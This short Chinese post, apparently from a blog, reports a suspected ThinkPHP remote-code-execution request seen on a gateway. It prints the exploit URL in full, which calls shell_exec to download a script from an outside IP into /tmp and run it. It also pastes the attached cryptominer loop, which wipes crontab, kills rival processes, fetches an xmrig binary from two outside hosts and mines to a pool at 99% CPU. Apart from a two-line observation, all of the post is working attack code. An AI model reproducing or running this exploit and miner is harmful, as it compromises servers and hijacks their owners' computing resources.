疑似ThinkPHP RCE的

在人家网关上看到的。

index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://81.6.42.123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a;

附上挖矿代码:

while true;
do
    crontab -r;
    ps -eo user,pid,time,comm | grep $("whoami") | grep -v 'xmrig' | awk 'BEGIN{ FS=":|-"; OFS=""; } { print $1,$2,$3,$4,$5,$6 }' | awk '$3>500' | awk '{print $2}' | xargs -r kill -9
    ps x | grep 'networkservic[e]' | awk '{print $1}' | xargs -r kill -9
    ps x | grep 'sysupdat[e]' | awk '{print $1}' | xargs -r kill -9
    if [ ! -s "/tmp/xmrig_s" ]; then
        wget http://81.6.42.123/xmrig_s -O /tmp/xmrig_s; chmod +x /tmp/xmrig_s;
    fi
    if [ ! -s "/tmp/xmrig_s" ]; then
        wget http://82.72.134.224/xmrig_s -O /tmp/xmrig_s; chmod +x /tmp/xmrig_s;
    fi
    if [ "$(ps -eo comm | grep -c "xmri[g]")" -lt "2" ]; then
        /tmp/xmrig_s -r 1000 --donate-level 1 -o 119.23.222.239:26590 -B -p pass -k --max-cpu-usage=99 ;
    fi
    sleep 120;
done

Leave a Reply